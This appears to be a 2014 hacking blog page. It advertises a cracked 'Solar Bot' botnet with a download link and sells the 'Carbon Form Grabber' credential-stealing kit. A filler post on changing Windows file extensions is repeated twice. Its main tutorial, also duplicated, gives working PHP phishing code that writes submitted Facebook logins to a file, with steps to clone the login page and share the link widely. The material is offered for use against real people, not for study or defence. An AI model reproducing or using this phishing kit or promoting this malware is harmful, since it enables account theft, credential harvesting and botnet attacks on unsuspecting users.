Solar Bot Cracked +How to setup Solar Bot on Web host | Free download link
Description
download link :
http://adf.ly/dOzgp
Web host :
http://www.000webhost.com/
------------------------------------------------------
Technical Details
Coded in Lazaru Pascal
Code is fully relocatable Shellcode
Uses custom CRC32 API loader
Uses BeaEngine Disassembler for x86 and x64
Uses named pipes for inter-process communication
Multpiple layers of encryption and compression
Global Ring 3 rootkit and No own process
Fully Unicode
No dependencies Only standard system DLLs
Multiple Anti-Debug methods
Unique Server-Bot traffic encryption
Anti bot installation
Features
Internet Explorer Formgrabber
Mozilla FireFox Formgrabber
Google Chrome Formgrabber
SPDY Grabbing
FTP and POP3 Grabber
SlowLoris DDOS and SlowPost DDOS
GET Flood
UDP DDOS
Update and Download System
MD5 Verified Update and Download System
Reverse Socks 5
Browse URL Visible
Browse URLHidden
contact me for more information (l33tconcept@gmail.com)
Tuesday, June 10, 2014
Carbon Form Grabber BOTNET - All Browser Intrusion !
I bring to you a brand new product! This is really very cool! This form grabber was written from scratch with the customer in mind.
we have made a web panel that is very intuitive, easy to use and sleek! This product was made for new comers and for pros,
it will suit the needs of any user with our easy to use panel and our advance features, this product is the best of both worlds.
The Carbon Form Grabber created by AlexHF runs on 32-bit and 64-bit platforms and exhibits some semi-persistence. the Carbon Grabber is composed of a Builder and an intuitive PHP Panel.
The Carbon Grabber is able to capture logins and passwords from SSL & HTTP webpages in Chrome, Firefox and Internet Explorer.
The kit contains the following features :
Startup (Hidden) - Meaning the process doesn’t appear in the Windows Task Manager.
Userkit (x86 & x64 )
Injection
Chrome SSL & HTTP Grabber
Firefox SSL & HTTP Grabber
Internet Explorer SSL & HTTP Grabber
Intuitive PHP Panel
Escalate to Administrator Privileges - Apparently performed via runas
Features
* Startup ( Hidden)
* Userkit(x86 & x64 )
* Injection
* Chrome SSL & HTTP Grabber
* Firefox SSL & HTTP Grabber
* Internet Explorer SSL & HTTP Grabber
* Intuitive PHP Panel
* Escalate to Administrator Privileges.
Contact Horlla on gmail for SETUP files or SETUPS - gmail ID- l33tconcept@gmail.com
Wednesday, June 4, 2014
How to change file extension on a windows computer
In my previous tutorial, i said am going to write a tutorial on how to change a file extension on a windows computer, changing a file extension is very simple and anyone should be able to do it if you follow the steps below properly.
According to the previous, we want to change the extension of our txt document to html, so i want you to follow the steps below to get it done.
1. Know which document you want to be able to change the file extension of.
Make a copy of this file and save it as another name so you will still be able to open the original in your word processing program.
Close the word processing program. You will work with the copied file from here on.
2. Select the "Start" button on the bottom left of your screen. Click your mouse to bring up the control panel. See the right side of the new screen.
Select "Appearance and Personalization."
Now, select "Folder Options," and then the "View" tab.
Go down the list until you find "Hide extensions for known file types." Uncheck that box.
Click on "Apply" and close the control options boxes.
3. Reopen the directory where the file is located.
Place your cursor on the file copy you just made. Right-click the file, making sure not to use a shortcut file.
Select "Rename" from the options they give you.
Change the extension manually by retyping the new program extension you want to use. Type .html if changing to HTML code and make it .txt if you want it to be a text file.
Move this file to the appropriate directory if you need to.
4. Understand the file has not undergone any new formatting as a result of this name change. It will open only if the desired program accepts it.
Otherwise, you may have to simply use copied text and graphics from the original document into a blank documents created in the new program. This workaround does not work on music files, but is great for newsletter articles in HTML code or a desktop publishing program.
You may have to change the word processing file into a text file (extension will be .txt) in some instances before saving it into the desktop publishing or .html file.
According to the previous, we want to change the extension of our txt document to html, so i want you to follow the steps below to get it done.
1. Know which document you want to be able to change the file extension of.
Make a copy of this file and save it as another name so you will still be able to open the original in your word processing program.
Close the word processing program. You will work with the copied file from here on.
2. Select the "Start" button on the bottom left of your screen. Click your mouse to bring up the control panel. See the right side of the new screen.
Select "Appearance and Personalization."
Now, select "Folder Options," and then the "View" tab.
Go down the list until you find "Hide extensions for known file types." Uncheck that box.
Click on "Apply" and close the control options boxes.
3. Reopen the directory where the file is located.
Place your cursor on the file copy you just made. Right-click the file, making sure not to use a shortcut file.
Select "Rename" from the options they give you.
Change the extension manually by retyping the new program extension you want to use. Type .html if changing to HTML code and make it .txt if you want it to be a text file.
Move this file to the appropriate directory if you need to.
4. Understand the file has not undergone any new formatting as a result of this name change. It will open only if the desired program accepts it.
Otherwise, you may have to simply use copied text and graphics from the original document into a blank documents created in the new program. This workaround does not work on music files, but is great for newsletter articles in HTML code or a desktop publishing program.
You may have to change the word processing file into a text file (extension will be .txt) in some instances before saving it into the desktop publishing or .html file.
Sunday, June 1, 2014
Hack a friend facebook account (THE EASY WAY)
How to hack people Facebook account
what you need
a web-hosting, a php web shell and a brain.
browse to facebook.com login page in your browser, when the page finish loading, right click on anywhere on the page and click on "view page source", it will show the source code of the page, copy all the codes and paste them in a new notepad, name the notepad "login", then open a new folder on your computer Desktop and name it facebook, move the text document named login to the newly created folder, create another text document and name it "phish" and copy and paste the following code inside and save it
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
create another text document in the same folder and name it "log.txt" and leave it blank.
After that open the notepad with the source code and press CONTROL + F "CTRL + F" key on your keyboard, it will show a small dialogue box where you can search for anything in the document, type "action=" without the quote and click find next till you find the action keyword that has something with login, in the case of facebook it will be something like the text below,
><form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"
replace the "https://www.facebook.com/login.php?login_attempt=1 it with" "phish.php" without quote so that it will look like the code below
><form id="login_form" action="phish.php"
then save it, so you will now have a document in the folder name facebook, so its time to rename the login.txt document to login.htm.
NOTE: if after renaming the text document to login.html it icon does not change to either chrome of firefox or the icon of any browser installed on your computer, and it appear to be something like login.html.txt, that means you need to changes to how your computer manage system file extension, you can comment below and i will get back to you or made my next tutorial on how to change file extension
If you are successful with all the steps above then you can continue to upload the folder to your web hosting or your shelled website. then share the link with as many people as possible, check the log.txt document for results.
what you need
a web-hosting, a php web shell and a brain.
browse to facebook.com login page in your browser, when the page finish loading, right click on anywhere on the page and click on "view page source", it will show the source code of the page, copy all the codes and paste them in a new notepad, name the notepad "login", then open a new folder on your computer Desktop and name it facebook, move the text document named login to the newly created folder, create another text document and name it "phish" and copy and paste the following code inside and save it
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
create another text document in the same folder and name it "log.txt" and leave it blank.
After that open the notepad with the source code and press CONTROL + F "CTRL + F" key on your keyboard, it will show a small dialogue box where you can search for anything in the document, type "action=" without the quote and click find next till you find the action keyword that has something with login, in the case of facebook it will be something like the text below,
><form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"
replace the "https://www.facebook.com/login.php?login_attempt=1 it with" "phish.php" without quote so that it will look like the code below
><form id="login_form" action="phish.php"
then save it, so you will now have a document in the folder name facebook, so its time to rename the login.txt document to login.htm.
NOTE: if after renaming the text document to login.html it icon does not change to either chrome of firefox or the icon of any browser installed on your computer, and it appear to be something like login.html.txt, that means you need to changes to how your computer manage system file extension, you can comment below and i will get back to you or made my next tutorial on how to change file extension
If you are successful with all the steps above then you can continue to upload the folder to your web hosting or your shelled website. then share the link with as many people as possible, check the log.txt document for results.
Subscribe to:
Posts (Atom)